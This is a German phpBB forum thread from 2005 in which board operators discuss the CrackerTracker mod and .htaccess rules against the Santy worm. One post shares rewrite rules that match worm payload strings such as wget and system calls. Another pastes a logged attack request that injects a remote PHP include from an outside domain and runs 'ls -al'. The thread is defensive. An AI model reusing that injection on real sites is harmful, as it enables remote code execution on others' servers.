CBACK CrackerTracker Worm Protector

Beitrag von **oxpus** » Mo 14.Feb, 2005 18:14

Nein. Damit würdest Du das Script 2000 Sekunden lang anhalten.

Beitrag von **adjustMan** » Mo 14.Feb, 2005 18:20

[quote="cback - Mo 14.Feb, 2005 17:54";p="23303"]Er probiert es lange Zeit[/quote]
ja, und ich habe den Eindruck, es belastet den Server enorm :rolleyes:

Beitrag von **Max** » Mo 14.Feb, 2005 19:31

naja, der Wurm in seiner fiesen Art belastet den Server enorm, weil er ja immer wieder versucht in eine Lücke einzudringen, die es nicht gibt.

Ich hatte den bisher via .htaccess ausgesperrt, das war auch bis vor ca. zwei Wochen recht brauchbar, aber dann wurde eines der Foren, die ich betreibe über eine seiner URLs massiv attackiert - hat bei allincl. eine Serverlast von 800% erzeugt - dann haben die immerzu versucht, bei mir den Fehler zu suchen. Naja ich habe denen gesagt, sie sollen vorerst die betroffene URL abschalten (war eine C-Domain) und schon war alles besser. Nun habe ich dann aber trotzdem das Tool hier aus dem Thread eingebaut aber es gibt jetzt nichts zu loggen :-)
Das Tool selbst belastet den Server absolut garnicht, wie das bei Wurmattacken aussieht, weiß aich aber nicht, denke aber, dass es weniger LAst ist, als der Wurm erzeugt.

Gruß Max

Beitrag von **cback** » Mo 14.Feb, 2005 19:38

denke aber, dass es weniger LAst ist, als der Wurm erzeugt.

Dafür wurde es speziell entwickelt, bei mir hatte der Wurm bevor ich mich an diesen MOD gesetzt habe am Tag glaub ich 3GB Traffic verbraten wo es sonst so höchstens mal 600MB sind. Und als ich es drin hatte warns abends trotz enormer attacken nur rund 670MB also doch enorme Traffic und leistungseinsparung. Vor allem weil SQL gar nicht mehr belastet wird

Beitrag von **oxpus** » Mo 14.Feb, 2005 19:42

Und in Verbindung mit dem .htaccess-Block ist der Mod unschlagbar und unbezwingbar!

Beitrag von **adjustMan** » Mo 14.Feb, 2005 19:58

[quote="oxpus - Mo 14.Feb, 2005 19:42";p="23313"]Und in Verbindung mit dem .htaccess-Block ist der Mod unschlagbar und unbezwingbar![/quote]
na da wär ich vorsichtig mit solchen Äusserungen. nichts ist unbezwingbar.

Beitrag von **oxpus** » Mo 14.Feb, 2005 20:03

Naja, ich bin ja schon ruhig

Beitrag von **tom10** » Di 15.Feb, 2005 06:45

Was genau empfiehlt sich da eigentlich in die .htaccess reinzupacken ?
Meine sieht momentan so aus:

Code: Alles auswählen

DirectoryIndex index.html index.htm portal.php index.php

RewriteEngine On

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
RewriteCond %{HTTP_COOKIE}% s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

Beitrag von **oxpus** » Di 15.Feb, 2005 08:11

Ja. das ist auch ausreichend. Mehr muss es nicht sein.
Wer will kann noch die Short URL's aufbauen, aber dazu ist auf http://www.phpbb.de ein grosses Topic vorhanden.

Beitrag von **el4efo** » Di 08.Mär, 2005 13:37

Kann es sein, dass der crackertracker probleme mit dem Highlight beim Search macht?

Hab nämlich folgendes Problem seit ich Ihn installiert hab:
http://www.oxpus.de/viewtopic.php?p=25153#25153

Beitrag von **el4efo** » Di 08.Mär, 2005 14:46

[SOLVED]
In Zeile 7 war ein "?>" zuviel.

Das muss wohl mal irgendwann beim modden reingerutscht sein.
Bin mit dem CrackerTracker bisher sehr zufrieden! Sorry für die Umstände.

Beitrag von **volker58** » Di 08.Mär, 2005 18:24

kann es sein das die würmer meine seite nimmer wollen, habe seit wochen keine logs mehr, er geht aber noch, habe es gerade so getestet

Code: Alles auswählen

viewforum.php?t=20&chr(

Beitrag von **cback** » Di 08.Mär, 2005 18:26

Hihi da hat der CTracker den Wurm wohl "Owned"

Beitrag von **tom10** » Mi 09.Mär, 2005 18:11

Ja , scheinbar, bei mir ist mittlerweile auch Ruhe!

Beitrag von **oxpus** » Mi 09.Mär, 2005 18:21

Kann mal jemand laut sein? Bei mir passiert nichts mehr, seit dem "Doppelschutz" durch den Cracker Tracker und .htaccess-Abwehr.
Und nochmals an dieser Stelle ein dickes Lob an CBack, der mit damals aus der grössten Patsche geholfen hat, in der mein Board stand (Auch wenn es schon x-mal passiert und ewig her ist!).

Beitrag von **AmigaLink** » Mi 09.Mär, 2005 20:18

Bei mir passiert nichts mehr, seit dem "Doppelschutz" durch den Cracker Tracker und .htaccess-Abwehr

Bei mir ebenfalls!

Beitrag von **SanTic** » So 13.Mär, 2005 18:11

Dito! Diese 'Ruhe' ist irgendwie....beunruhigend. ^^

Beitrag von **oxpus** » So 13.Mär, 2005 18:37

Sei doch froh! Dann weißt Du, daß
A. Nichts passiert
B: Der Schutzwall hält

BTW: Schau doch mal in Deine Log-Files. Da wirst Du sicherlich Herzschmerzen bekommen, was da alles festgehalten wird

Beitrag von **blondi** » Fr 18.Mär, 2005 23:45

eben bemerkt....

Datum IP User Agent Request URI
17.03.2005, 20:17 24.226.36.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0 t=65&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://apostolateforholyrelics.com/conf ... uote]Datum IP User Agent Request URI
17.03.2005, 20:17 24.226.36.32 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0 t=65&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://apostolateforholyrelics.com/conf ... d=ls%20-al[/quote]

seit wann steht da eine domain dabei... und seit neuerstens Opera 8.0
hatte jetzt gut eine woche ruhe nun wieder cracks...

@oxpus
habe eben 2 bugs entdeckt bei dir...

zum einen hier im post wenn ich zitiere Auswahl mache, kopiert er mein post ein zweites mal mit rein...

und als ich da beim ersten mal gemacht habe und es bei mir markiert war auf meiner seite was ich bei dir einfügen wollte, stürzte deine seite komplett ab und der browser wurde geschlossen.... allerdings denke ich hierbei, das es sich um einen fehler im ie 6.0 handelt... nur zur info...

liebe grüsse

Beitrag von **cback** » Sa 19.Mär, 2005 00:36

Der Wurm entwickelt sich weiter bzw. wird weiterentwickelt um verschiedene Sperrsysteme z.B über .htaccess oder andere Schutzsysteme zu umgehen. CrackerTracker is allerdings immer noch ohne Update absolut sicher vor der neuesten Generation des Wurmes die ich bereits angesehen habe.

Beitrag von **oxpus** » Sa 19.Mär, 2005 02:13

zum einen hier im post wenn ich zitiere Auswahl mache, kopiert er mein post ein zweites mal mit rein...

Bei mir nicht. Weder mit Firefox noch mit dem IE.

Beitrag von **AmigaLink** » Sa 19.Mär, 2005 08:11

^^ Bei mir auch nicht.

Beitrag von **cback** » Sa 19.Mär, 2005 11:07

Bei mir auch nicht. PS: Auf dem Button keinen Doppelklick ausführen, ein einfach klick reicht da

(was ich wegen nem leichten Linux einschlag sowieso überall mach *g*)

Beitrag von **blondi** » Sa 19.Mär, 2005 11:55

seltsam, hatte das gester 2 mal oxpus...
wahrscheinlich IE 6.0 billyboys sorgenkind denke ich wird daran schuld gewesen sein..

grüsse

Beitrag von **oxpus** » Sa 19.Mär, 2005 16:26

Ich konnte vor 2 Stunden nicht mehr surfen: Ladezeiten waren extram hoch.
Rechner (mit Windows XP) einmal neu gestartet (nachdem ich mit ein paar Neuwagen angeschaut habe) und es geht wieder.
MS sei dank